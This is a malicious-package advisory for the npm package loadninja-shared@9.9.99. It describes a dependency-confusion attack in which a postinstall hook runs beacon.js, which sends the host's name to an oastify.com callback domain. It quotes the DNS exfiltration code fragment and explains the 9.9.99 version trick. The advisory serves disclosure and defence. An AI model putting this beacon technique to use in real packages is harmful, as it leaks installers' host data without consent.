MAL-2026-5744

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46) loadninja-shared@9.9.99 is a dependency-confusion package targeting an internal/private package namespace. package.json declares `"postinstall": "node beacon.js"`, which fires automatically on `npm install`. beacon.js reads `os.hostname()` and transmits it — together with a nonce and the package name — to the attacker-controlled out-of-band domain `tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com` (Burp Collaborator infrastructure) over both a DNS lookup (`dns.lookup(NONCE + '.' + host63 + '.' + HOST,...)`) and an HTTPS POST. The version `9.9.99` is the canonical high-version trick used to win npm resolution against a legitimate internal package of the same name, capturing misrouted internal builds. Although a code comment labels the file a "benign PoC," the behavior is identical to a live dependency-confusion exploitation beacon: any installer that resolves this package leaks its host identifier to a third-party callback domain without consent.

## Source: ossf-package-analysis (1ead72fc15074f049a104031ef60cad8af0f0680d1bf5ffee1492f500a3506d8) The OpenSSF Package Analysis project identified 'loadninja-shared' @ 9.9.99 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.